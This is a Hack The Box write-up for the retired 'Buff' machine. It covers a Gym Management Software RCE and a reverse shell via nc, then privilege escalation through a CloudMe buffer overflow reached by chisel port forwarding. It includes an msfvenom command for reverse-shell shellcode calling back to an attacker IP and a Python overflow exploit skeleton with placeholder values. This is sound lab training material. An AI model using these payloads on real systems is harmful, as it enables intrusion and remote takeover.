Buff is a retired Windows machine on Hack The Box. The goal is to use the vulnerabilities on it to obtain the user and root flags.
We start with an nmap scan to identify the target's open ports and services.
Full Port Scan
The scan shows two open ports: 7680/tcp, which nmap labels pando-pub from its service table (the label comes from the port number, not from a banner), and 8080/tcp running Apache httpd 2.4.43.
We enumerate port 8080 first.
The page source gives us nothing useful, but the site itself is clearly about fitness.
We run gobuster to look for hidden files and directories.
The scan turns up nothing of interest.
So we continue enumerating through the web interface itself.
The site is built with Gym Management Software 1.0, so we search for known vulnerabilities in it.
There is a known remote code execution (RCE) vulnerability for it. We pull the exploit down to our machine and read through it.
Nothing in the code needs changing, so we run it as is.
It gives us a shell as buff\shaun.
The shell is not stable, though: we cannot change directories, among other things, which is typical of a command runner that executes each command in a fresh process.
So we transfer nc to the target and use it to get a proper reverse shell.
When we serve an SMB share without credentials, the target rejects it, so we cannot mount it from PowerShell. Recent Windows builds refuse guest (unauthenticated) access to SMB shares by default.
Therefore we create the share with a username and password instead.
The copy of nc succeeds.
Now we run nc to get a reverse shell.
With a proper shell we grab the user flag. We cannot access the Administrator folder, so we continue with local enumeration.
Local enumeration shows that CloudMe_1112.exe is running.
(CloudMe is a file storage service operated by CloudMe AB that offers cloud storage, file synchronization and client software.)
We check whether there is a known vulnerability in it.
There are exploits matching this version of the CloudMe executable, but they are written in Python, which is not installed on Windows by default, so we cannot run them on the target. Instead we forward the port CloudMe listens on back to our own machine and run the exploit locally.
We transfer chisel to the target.
Then we set up the port forward with chisel.
With the forward in place we list the CloudMe exploits.
We download the PoC exploit and edit it.
As it stands the PoC only pops the calculator; we want a reverse shell instead.
msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.19 LPORT=4700 -b '\x00\x0A\x0D' -f python -v payload
This generates the shellcode with msfvenom: an x86 windows/shell_reverse_tcp connecting back to 10.10.14.19 on port 4700, encoded to avoid the bad characters \x00, \x0A and \x0D, and emitted in Python format as a variable named payload so it can be pasted straight into the PoC.
We update the PoC, replacing its calculator shellcode with the payload we generated.
We add the payload and start a listener on port 4700 to catch the shell.
Running the exploit gives us a shell as Administrator.
From there we read the root flag.
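Editing the PoC in this way comes down to three things: rebuilding the shellcode from msfvenom's Python-format output, checking that none of the bad characters survived, and placing it after the return-address overwrite before sending it through the forwarded port. The block below is an added example written for this write-up, not the downloaded PoC or the author's edited copy. The offset (1052), the gadget address (0x68A842B5), the 30-byte NOP sled and the target port 8888 are assumptions that must be taken from the PoC actually downloaded; the msfvenom output embedded in it is a constructed fragment, not a real payload.

```python
import re
import socket
import struct

# Bad characters passed to msfvenom in the write-up: -b '\x00\x0A\x0D'
BADCHARS = b"\x00\x0a\x0d"

# Stack layout of the PoC.  None of these values appear in the write-up;
# they are assumptions for this example and must be read from the PoC you
# downloaded (its padding length and the address it writes over EIP).
OFFSET = 1052                # assumed bytes of filler before the saved return address
RET_ADDR = 0x68A842B5        # assumed PUSH ESP; RET style gadget, packed little-endian below
NOP_SLED = b"\x90" * 30      # assumed landing pad between the gadget and the shellcode

# Where to send the buffer.  Assumed: with a chisel reverse forward such as
# R:8888:127.0.0.1:8888 in place, 127.0.0.1:8888 on the attacking box reaches
# CloudMe on the target.
TARGET = ("127.0.0.1", 8888)

# Matches the b"\x..\x.." literals that msfvenom -f python emits.
_BYTES_RE = re.compile(r'b"((?:\\x[0-9a-fA-F]{2})+)"')


def parse_msfvenom_python(text: str) -> bytes:
    """Rebuild the shellcode from the text msfvenom prints with -f python -v payload.

    msfvenom emits `payload =  b""` followed by `payload += b"\\x..."` lines;
    every quoted byte literal is extracted and concatenated in order.
    """
    out = bytearray()
    for chunk in _BYTES_RE.findall(text):
        out += bytes.fromhex(chunk.replace("\\x", ""))
    return bytes(out)


def find_badchars(payload: bytes, badchars: bytes = BADCHARS) -> set:
    """Return the forbidden byte values that still occur in the payload.

    The encoder should have removed them, but a wrong -b string or a hand
    edit that re-introduces one is a common reason a working PoC stops working.
    """
    return {b for b in badchars if b in payload}


def build_buffer(payload: bytes) -> bytes:
    """Assemble filler + return address + NOP sled + shellcode, refusing bad chars."""
    bad = find_badchars(payload)
    if bad:
        raise ValueError("payload contains bad chars: %s" % [hex(b) for b in sorted(bad)])
    buf = b"A" * OFFSET                   # reaches the saved return address
    buf += struct.pack("<I", RET_ADDR)    # overwrites EIP with the gadget (32-bit, little-endian)
    buf += NOP_SLED                       # lands execution just before the shellcode
    buf += payload
    return buf


def send_exploit(buf: bytes, target=TARGET) -> int:
    """Deliver the buffer to CloudMe through the forwarded port; returns bytes sent."""
    with socket.create_connection(target, timeout=5) as s:
        return s.send(buf)


# Constructed stand-in for msfvenom's output (15 arbitrary bytes, not real
# shellcode), so the script can be checked without msfvenom installed.
SAMPLE_MSFVENOM_OUTPUT = r'''
payload =  b""
payload += b"\xdb\xc0\xd9\x74\x24\xf4\x5e\x33"
payload += b"\xc9\xb1\x52\x31\x5e\x17\x83"
'''


if __name__ == "__main__":
    shellcode = parse_msfvenom_python(SAMPLE_MSFVENOM_OUTPUT)
    buf = build_buffer(shellcode)
    print("shellcode %d bytes, buffer %d bytes, EIP overwrite at offset %d"
          % (len(shellcode), len(buf), OFFSET))
    # With nc -nvlp 4700 listening and the forward in place:
    # send_exploit(buf)
```

Run it with the chisel forward in place and nc listening on 4700 (the LPORT given to msfvenom); the send is left commented out so the buffer can be assembled and checked offline first, and the bad-character check is the first thing to look at if the shell never arrives.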